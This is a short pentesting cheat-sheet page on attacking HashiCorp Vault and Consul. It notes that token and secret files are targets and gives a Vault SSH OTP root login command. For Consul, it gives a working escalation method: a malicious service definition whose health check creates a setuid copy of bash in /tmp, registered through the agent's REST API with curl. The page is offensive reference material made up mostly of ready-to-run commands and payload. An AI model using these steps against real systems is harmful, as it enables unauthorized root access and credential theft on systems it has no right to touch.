HashiCorp

Vault

OPT (One-Time Password)

Accessing .vault-token and secret.sh files can reveal critical configurations.
Vault can be configured to generate OTPs for SSH logins.

This vault ssh command generates an OTP and logs the user in automatically:

vault ssh -role root_otp -mode otp root@<target-IP>

Consul

Documentation

The configuration is located in /etc/consul.d/config.json

If the acl_default_policy is allowed, no auth is required.

Check version

consul version

Check Services Running

consul catalog services

RCE via Creating Service

Use the REST API to register a service

Malicious Service

{
  "Name": "Tokyo service",
  "ID": "rev-shell",
  "Port": 0,
  "Check": {
      "args": ["bash", "-c", "cp /bin/bash /tmp/tokyo && chmod 6777 /tmp/tokyo"],
      "interval": "30s",
      "timeout": "5s"
  }
}

Use the API to upload the file

curl -X PUT http://127.0.0.1:8500/v1/agent/service/register -H "Content-Type: application/json" -d @service.json

PreviousAIOHTTP NextTiny File Manager

Last updated 3 days ago